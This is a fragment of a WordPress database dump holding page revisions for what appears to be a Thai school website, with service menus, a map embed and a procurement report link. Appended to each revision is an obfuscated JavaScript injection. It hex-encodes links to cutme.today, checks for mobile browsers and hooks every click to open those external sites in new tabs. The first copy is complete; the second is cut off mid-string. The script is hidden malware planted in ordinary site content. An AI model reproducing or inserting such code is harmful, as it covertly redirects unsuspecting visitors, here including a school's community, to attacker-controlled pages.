"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 11:45:32','2024-08-15 04:45:32','',14,'http://pakhaeng.ssk.in.th/?p=854',0,'revision','',0),
(855,1,'2024-08-15 11:47:31','2024-08-15 04:47:31','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21144&authkey=!AEPBY7T23e8S_mk&em=2\" width=\"1500\" height=\"500\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:file {\"id\":856,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-0909a419-cdc4-40ee-9044-86145bb0456e\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\">รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0909a419-cdc4-40ee-9044-86145bb0456e\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\